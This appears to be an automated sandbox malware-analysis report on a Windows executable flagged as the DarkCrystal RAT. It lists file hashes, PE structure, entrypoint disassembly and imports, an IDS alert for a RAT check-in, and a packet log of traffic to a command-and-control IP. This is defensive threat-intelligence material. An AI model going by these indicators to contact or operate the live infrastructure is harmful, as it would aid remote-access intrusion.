                                                                                                                                Size (bytes):1913344
                                                                                                                                Entropy (8bit):7.53887100759396
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:unUENJIo5FiAVjO1OtgyKzGgA2Xnb6d0:unV5FiKlvbyOd
                                                                                                                                MD5:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                SHA1:D83C575DC2621B593918660EEC03CE077D5FAC39
                                                                                                                                SHA-256:565BB537A0AA8344D7AFAC9DD87DAB20AD33CF09B5F833476EE6C00BFDC938DC
                                                                                                                                SHA-512:96DA7384FB9A2B494077E0CF6CB5E0F4FC11C57B9F3ACD1E3E0F5549F22938056FEC4EDA5B9D0D7B773AFFAD9BF99D03A1C782A74E480A0830D63C3296C7AD18
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....og.................*..........nI... ...`....@.. ....................................@................................. I..K....`.. ............................................................................ ............... ..H............text...t)... ...*.................. ..`.rsrc... ....`.......,..............@....reloc...............0..............@..B................PI......H.......l...8................s...H.......................................0..........(.... ........8........E....*.......N...)...8%...(.... ....~....{y...9....& ....8....*(.... ....~....{....9....& ....8....(.... ....~....{}...:....& ....8y......0.......... ........8........E........F.......R...f.......8........~....(K...~....(O... ....?*... ....~....{....:....& ....8....r...ps....z*~....9.... ....8}......... ....~....{....9c...& ....8X...~....(C... .... .... ....s....~....(G.

                                                                                                                                \Device\Null

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\w32tm.exe
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):151
                                                                                                                                Entropy (8bit):4.815159774221702
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:VLV993J+miJWEoJ8FXhRQum5VLvXVJFAqvom5QLy6vj:Vx993DEUGBm5teVm5Qu8
                                                                                                                                MD5:BD6AFC1CC87E3C6F60428DC3CD0CBCB4
                                                                                                                                SHA1:33CCD4DAEB7000B4B54E977010A88AA5661305EE
                                                                                                                                SHA-256:075F00274F54C4CF636A8FC1BB7A3AA25820D8017A2E3A75121D2833FF3E6520
                                                                                                                                SHA-512:260B0AFE1FD60ECA1135F64441C3AF89B8B62CE5B0FDC6A49A1F3AF4EF56D3B85A62ECBF56899A4AC53E86A5D6F9C46214F65EA38FD6E58B80DB41F468DF10C9
                                                                                                                                Malicious:false
                                                                                                                                Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 01/01/2025 17:46:40..17:46:40, error: 0x80072746.17:46:45, error: 0x80072746.

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Entropy (8bit):7.476797017112258
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:544WP3NHaP.exe
                                                                                                                                File size:2'235'083 bytes
                                                                                                                                MD5:50abe040b81818bf7ece156a10dbbbc9
                                                                                                                                SHA1:6abd8cfaaeea27ea9b2c7e5a6e05e9f4357c6050
                                                                                                                                SHA256:730cba8b2d68de1062f9ccaa22e62b4cdb71f08283d1d5fd985941e7e3087921
                                                                                                                                SHA512:48f382969adae8e40bdf5825581d2d545a2b8741889f42e79cd8379ce48c8d91c28eee924d36416b6331a8ad4c3e1c0772c5cea110b1355d9debd58f329da078
                                                                                                                                SSDEEP:49152:IBJEnUENJIo5FiAVjO1OtgyKzGgA2Xnb6d0v:y+nV5FiKlvbyOd6
                                                                                                                                TLSH:57A5BE1279D24F32C2E95B3186564A3E5296D7223A51FF1F361F21C6A9177F08E322B3
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                                                                                                File Icon

                                                                                                                                Icon Hash:1515d4d4442f2d2d

                                                                                                                                Static PE Info

                                                                                                                                General

                                                                                                                                Entrypoint:0x41f530
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:5
                                                                                                                                OS Version Minor:1
                                                                                                                                File Version Major:5
                                                                                                                                File Version Minor:1
                                                                                                                                Subsystem Version Major:5
                                                                                                                                Subsystem Version Minor:1
                                                                                                                                Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                                                                                                Entrypoint Preview

                                                                                                                                Instruction
                                                                                                                                call 00007F7C347FBEFBh
                                                                                                                                jmp 00007F7C347FB80Dh
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                push esi
                                                                                                                                push dword ptr [ebp+08h]
                                                                                                                                mov esi, ecx
                                                                                                                                call 00007F7C347EE657h
                                                                                                                                mov dword ptr [esi], 004356D0h
                                                                                                                                mov eax, esi
                                                                                                                                pop esi
                                                                                                                                pop ebp
                                                                                                                                retn 0004h
                                                                                                                                and dword ptr [ecx+04h], 00000000h
                                                                                                                                mov eax, ecx
                                                                                                                                and dword ptr [ecx+08h], 00000000h
                                                                                                                                mov dword ptr [ecx+04h], 004356D8h
                                                                                                                                mov dword ptr [ecx], 004356D0h
                                                                                                                                ret
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                push esi
                                                                                                                                mov esi, ecx
                                                                                                                                lea eax, dword ptr [esi+04h]
                                                                                                                                mov dword ptr [esi], 004356B8h
                                                                                                                                push eax
                                                                                                                                call 00007F7C347FEC9Fh
                                                                                                                                test byte ptr [ebp+08h], 00000001h
                                                                                                                                pop ecx
                                                                                                                                je 00007F7C347FB99Ch
                                                                                                                                push 0000000Ch
                                                                                                                                push esi
                                                                                                                                call 00007F7C347FAF59h
                                                                                                                                pop ecx
                                                                                                                                pop ecx
                                                                                                                                mov eax, esi
                                                                                                                                pop esi
                                                                                                                                pop ebp
                                                                                                                                retn 0004h
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                sub esp, 0Ch
                                                                                                                                lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                call 00007F7C347EE5D2h
                                                                                                                                push 0043BEF0h
                                                                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                                                                push eax
                                                                                                                                call 00007F7C347FE759h
                                                                                                                                int3
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                sub esp, 0Ch
                                                                                                                                lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                call 00007F7C347FB918h
                                                                                                                                push 0043C0F4h
                                                                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                                                                push eax
                                                                                                                                call 00007F7C347FE73Ch
                                                                                                                                int3
                                                                                                                                jmp 00007F7C348001D7h
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                push 00422900h
                                                                                                                                push dword ptr fs:[00000000h]

                                                                                                                                Rich Headers

                                                                                                                                Programming Language:
                                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                                • [IMP] VS2008 SP1 build 30729

                                                                                                                                Data Directories

                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                Sections

                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                Resources

                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                                                                PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                                                                RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                                                                                                RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                                                                                                RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                                                                                                RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                                                                                                RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                                                                                                RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                                                                                                RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                                                                                                RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                                                                                                RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                                                                                                RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                                                                                                RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                                                                                                RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                                                                                                RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                                                                                                RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                                                                                                RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                                                                                                RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                                                                                                RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                                                                                                RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                                                                                                RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                                                                                                RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                                                                                                RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                                                                                                RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                                                                                                RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                                                                                                RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                                                                                                RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                                                                                Imports

                                                                                                                                DLLImport
                                                                                                                                KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                                                                                OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                                                                gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                                                                                Possible Origin

                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                EnglishUnited States

                                                                                                                                Network Behavior

                                                                                                                                Suricata IDS Alerts

                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                2025-01-01T21:47:26.530224+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449736172.67.220.19880TCP

                                                                                                                                Network Port Distribution

                                                                                                                                TCP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Jan 1, 2025 21:47:26.037059069 CET4973680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:26.041835070 CET8049736172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:26.042010069 CET4973680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:26.042237043 CET4973680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:26.046994925 CET8049736172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:26.405664921 CET4973680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:26.410569906 CET8049736172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:26.486622095 CET8049736172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:26.530224085 CET4973680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:26.761311054 CET8049736172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:26.761328936 CET8049736172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:26.761379957 CET4973680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:26.832427979 CET4973680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:26.837246895 CET8049736172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:26.926012039 CET8049736172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:26.940529108 CET4973680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:26.945362091 CET8049736172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:27.196523905 CET8049736172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:27.327104092 CET4973680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:28.011974096 CET4973780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:28.016954899 CET8049737172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:28.017039061 CET4973780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:28.017227888 CET4973780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:28.022031069 CET8049737172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:28.114815950 CET4973680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:28.122257948 CET8049736172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:28.122306108 CET4973680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:28.127743006 CET4973980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:28.134938955 CET8049739172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:28.135008097 CET4973980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:28.135123968 CET4973980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:28.142252922 CET8049739172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:28.387712002 CET4973780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:28.393755913 CET8049737172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:28.393851995 CET8049737172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:28.461664915 CET8049737172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:28.493648052 CET4973980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:28.495064020 CET4973780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:28.498605013 CET8049739172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:28.499990940 CET8049737172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:28.500070095 CET4973980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:28.500081062 CET4973780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:28.619968891 CET4974180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:28.624887943 CET8049741172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:28.625015020 CET4974180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:28.627285957 CET4974180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:28.632082939 CET8049741172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:28.983504057 CET4974180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:28.988574028 CET8049741172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:29.090163946 CET8049741172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:29.138842106 CET4974180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:29.394495010 CET8049741172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:29.530235052 CET4974180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:29.613974094 CET4974180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:29.615596056 CET4974280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:29.618983984 CET8049741172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:29.619144917 CET4974180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:29.620425940 CET8049742172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:29.620572090 CET4974280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:29.620697021 CET4974280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:29.625405073 CET8049742172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:29.967943907 CET4974280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:29.972738028 CET8049742172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:30.068409920 CET8049742172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:30.217741013 CET4974280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:30.343569994 CET8049742172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:30.530235052 CET4974280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:30.550679922 CET4974280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:30.552258015 CET4974480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:30.555702925 CET8049742172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:30.555833101 CET4974280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:30.557096004 CET8049744172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:30.557173014 CET4974480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:30.557286024 CET4974480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:30.562010050 CET8049744172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:30.905539989 CET4974480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:30.910387993 CET8049744172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:31.004554987 CET8049744172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:31.216694117 CET8049744172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:31.216821909 CET4974480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:31.283631086 CET8049744172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:31.387818098 CET4974480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:31.424408913 CET4974580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:31.429266930 CET8049745172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:31.429347992 CET4974580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:31.429449081 CET4974580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:31.434211016 CET8049745172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:31.651635885 CET4974680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:31.658145905 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:31.658205032 CET4974680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:31.658973932 CET4974680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:31.665368080 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:31.780545950 CET4974580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:31.785408020 CET8049745172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:31.873199940 CET8049745172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.030231953 CET4974580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:32.031936884 CET4974680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:32.037965059 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.037972927 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.037978888 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.037985086 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.037993908 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.038037062 CET4974680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:32.038058043 CET4974680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:32.039150953 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.039155960 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.039165020 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.039167881 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.039227009 CET4974680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:32.042593002 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.042673111 CET4974680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:32.042879105 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.042882919 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.042927027 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.042931080 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.042934895 CET4974680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:32.042938948 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.042943001 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.042984962 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.042990923 CET4974680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:32.043206930 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.043353081 CET4974680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:32.044009924 CET8049746172.67.220.198192.168.2.4
